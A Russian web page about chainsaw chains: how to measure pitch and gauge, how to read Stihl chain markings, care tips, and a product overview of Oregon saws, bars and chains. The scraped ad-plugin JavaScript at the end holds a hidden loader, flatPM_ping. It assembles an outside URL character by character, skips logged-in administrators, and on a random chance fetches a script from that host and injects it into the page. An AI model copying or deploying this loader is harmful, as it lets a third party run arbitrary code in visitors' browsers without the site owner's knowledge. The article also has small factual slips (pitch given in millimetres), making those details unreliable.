Для правильного определения шага цепи следует произвести замер расстояния между осями трёх заклёпок, как показано на Рис.1, предварительно натянув цепь. Формула выглядит следующим образом: S=L/2.

Пример замера шага цепь на фотоснимке 1.


Фото 1.

Определение толщины звена
Толщина приводного (ведущего) звена иметь несколько стандартных значений. Чем большее значение имеет это параметр, тем более тяжелые нагрузки может выдерживать цепь. Стандартные значения 1.1 мм, 1.3 мм., 1.5 мм. и 1.6 мм. На фотоснимке 2 показан пример замера толщины звена.

Фото 2.

Маркировка пильных цепей Штиль
Компания Stihl использует специальную систему обозначения цепей для бензопил, которая помогает легко распознать любую цепь по простому коду.

Например цепь с маркировкой 63PM3. Первая цифра показывает шаг цепи ⅜»Picco, вторая цифра толщину звена — 1,3мм. Первая буква обозначает тип цепи — Picco, вторая буква описывает форму зуба Micro. Последняя цифра — дополнительное бугорчатое звено.
Тип цепи Stihl может быть P — Picco или R — Rapid.
Форма зуба (вторая буква в маркировке цепи):
• S — Super долотообразный профиль;
• M — Micro полудолотообразный профиль;
• D — Duro твердосплавная напайка;
• R — Rescure цепь для спасательных работ.
Все цепи Stihl относятся к комфорт классу С, и означает низкую вибрацию при работе цепи. При этом, не многие производители цепей выпускают такие цепи класса С.

Фото 3. Фото 4.

Как понять какая цепь у вашей пилы?
Во-первых внимательно осмотрите цепь. На цепях серьезных производителей будет выгравировано или выбито имя производителя. Если на цепи имени нет, будьте особенно внимательны при работе, т.к с цепью может произойти что угодно и пользователь может получить травму. Кроме этого, на фото вы видите на пильном звене цифры, в одном случае 2, в другом — 6. Обратимся к таблице и поймем что на фотоснимке номер 3 цепь с шагом 0,325», а на фотоснимке номер 4 — ⅜» P.
На ведущем звене выбиты цифры 5 и 3. Цифра 5 говорит о том, что толщина ведущего звена 1,5 мм, а цифра 3 — 1,3 мм.

Типы цепей Stihl
Типы цепи Stihl Picco и Rapid различаются размером. Режущий зуб Rapid крупнее, соответственно цепь пилит более агрессивно, быстрее, но и пилить такой цепью труднее, наблюдается большая отдача при пилении. Такую цепь необходимо чаще затачивать. Цепь с профилем зуба Micro предназначена для мягкого реза с маленькой отдачей и в основном используется на любительских пилах. Цепь затачивается реже, чем цепь Rapid. Цепь Super предназначена для быстрого реза с высокой производительностью и большей отдачей и применяется на полупрофессиональных и профессиональных пилах. Duro — зуб с твердосплавной напайкой, которая позволяет цепи служить значительно дольше и пилить грязную или горелую древесину.

О Заточке цепи
Обращаем ваше внимание на то, что цепь должна быть хорошо и правильно заточена. Определить что цепь необходимо затачивать можно по размеру стружки, образующейся при пилении (если стружка мелкодисперсная, как мука, то цепь необходимо заточить) и по повышенному усилию пользователя при пилении (пила с хорошо заточенной цепью пилит под своим весом, оператор только поддерживает пилу и не давит на нее). О правилах заточки цепи мы расскажем отдельно.

Правила эксплуатации цепных пил
Существует несколько правил, соблюдение которых позволит легко, долго, безопасно и с минимальными затратами работать цепной пилой.
1. Содержать пилу, цепь и пильную гарнитуру в чистоте. Использовать только правильное масло, подходящую шину и цепь.
2. Своевременно производить заточку цепи. Своевременно производить смазку ведомой звездочки.
3. Поворачивать шину на 180 градусов при замене цепи. Пильная гарнитура прослужит значительно дольше.

Бензопилы «Oregon» / «Орегон»

Американский производитель «Орегон» — один из немногих на сегодня, который специализируется не только на производстве техники, но и на ее качественной оснастке. Именно поэтому цепные полотна «Oregon» успешно применяются другими компаниями в качестве пильной гарнитуры. Стойкость к износу, вариативность модельного ряда и неприхотливость в уходе – вот то, что более всего отличает бензопилы «Oregon» и их режущие полотна.

Бензопила «Орегон» WGCS 401

Бензопила бытового класса. Она оборудована карбюраторным бензиновым двигателем, который функционирует в 2-тактном режиме. Отличительной особенности прибора этой маркировки является применение направляющей Double Guard 91, что заметно продлевает срок службы бензопилы.

Среди других достоинств бензопилы Орегон необходимо отметить:

  • хромированные цилиндры;
  • смазка цепи автоматически поступает из масленки;
  • наличие стопорного ограничителя для безопасной распиловки;
  • использование длинной шины;
  • высокие балансировочные свойства;
  • прорезиненная передняя рукоять;
  • праймер, облегчающий работу зимой;
  • комплектация пластиковым защитным кожухом, облегчающим процесс ее транспортировки.

Технические характеристики:

  • Мощностное усилие – 2 л.с.;
  • Направляющая – 400 мм;
  • Бензобак – 400 мл;
  • Картер для масла – 200 мл;
  • Масса – 4,7 кг.

Комплектация:

  • бензопила;
  • направляющая и режущий элемент (по 1 шт);
  • свечной ключ;
  • кожух для шины;
  • напильник;
  • инструкция по эксплуатации.

Особенности направляющей Double Guard 91 и ее применение

Кроме бензопил «Oregon» она успешно применяется в других цепных инструментах – аккумуляторных цепных пилах «Орегон» под маркировкой CS250. Следует отметить, что именно это обстоятельство позволило ее пользователям забыть о необходимости заточки цепи и распиливать любую древесину со скоростью 12 м/с.

В отличие от других типов шин, рассматриваемая представляет собой направляющую с минимальной отдачей. В ней реализован запатентованный данным брендом механизм автоматического натяжения цепи, что не только ускоряет его, но и делает абсолютно безопасным. Это актуально не только для непрофессионалов, но и специалистов, посвящающих этому занятию 8-10 часов в день.

Преимущества:

  • суженная передняя (носовая) часть шины;
  • симметричность конструкции;
  • легкость;
  • маневренность;
  • реверсивность;
  • усиленная зубчатая рейка и шестерня;
  • встроенный функционал Wedge Lock, который блокирует пильную систему;
  • адаптированность для бытовых электропил и бензопил с двигателями, объем которых не превышает 35 см 3 ;
  • система самозаточки цепи – PowerSharp, которая реализована только для этих направляющих.

Рабочие параметры направляющей Double Guard 91:

  • Величина – 16 дюймов (400 мм);
  • Толщина звеньев – 1,3 мм;
  • Число звеньев – 56 (57);
  • Шаг – 0,325 мм;
  • Комплектация цепными полотнами – Oregon 91Р, 91 РХ, 91 VXL и др.

Где еще, кроме бензопил «Орегон», используется шина Double Guard 91?

Среди наиболее известных производителей стоит отметить:

  • Bosch (AKE30B, PKE25);
  • Dolmar (ES162A, PS33);
  • Husqvarna (23, T425);
  • Makita (5016, UC4530A);
  • McCulloch (440, TITAN46);
  • Oleo-Mac (932);
  • Ryobi (PCN3335);
  • Efco (MT350);
  • Homelite и др.

Всего число модификаций, где можно ее встретить, превышает 100 единиц.

Разнообразие цепей для бензопил «Орегон» и других бензорезов с направляющей Double Guard 91

С данной направляющей чаще всего используются ножи:

  • 91VXL;
  • 91VXL Multi-cut ™ ;
  • 90PX;
  • 91P;
  • 91 POWERSHARP®.

Достоинства цепного полотна «Орегон» 91VXL:

Особенности «Oregon» 91VXL Multi-cut ™ :

  • хромированное покрытие;
  • работа в тяжелых условиях;
  • увеличенный ресурс режущей кромки;
  • пиление загрязненной, старой, а так же пропитанной химическими веществами древесины.

«Орегон» 90PX:

  • высокий скоростной режим;
  • минимальная толщина звена и облегченная конструкция для сниженного сопротивления при распиле;
  • долгий срок работы;
  • устанавливается на бытовые бензопилы.

Преимущества «Орегон» 91P:

  • фасочные резцы;
  • подходит для распиловки сухих пиломатериалов;
  • рассчитана на непрофессионалов.

Свойства цепи «Oregon»91 POWERSHARP:

  • долговечность;
  • автоматическая заточка на самом инструменте, не требующая ее демонтажа;
  • идеальный вариант для аматоров.

Уход за бензопилами и комплектующими «Oregon»

Для долговечной их работы важно соблюдать следующие правила:

  • параллельно с новой пильной гарнитурой устанавливать новую звездочку. Муфта сцепления заменяется после каждых двух изношенных цепей;
  • новое цепное полотно должно пройти стадию обкатки;
  • эксплуатировать пилы «Oregon» с провисшими цепями запрещается;
  • заправлять качественное масло для смазки и своевременно затачивать зубья.
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика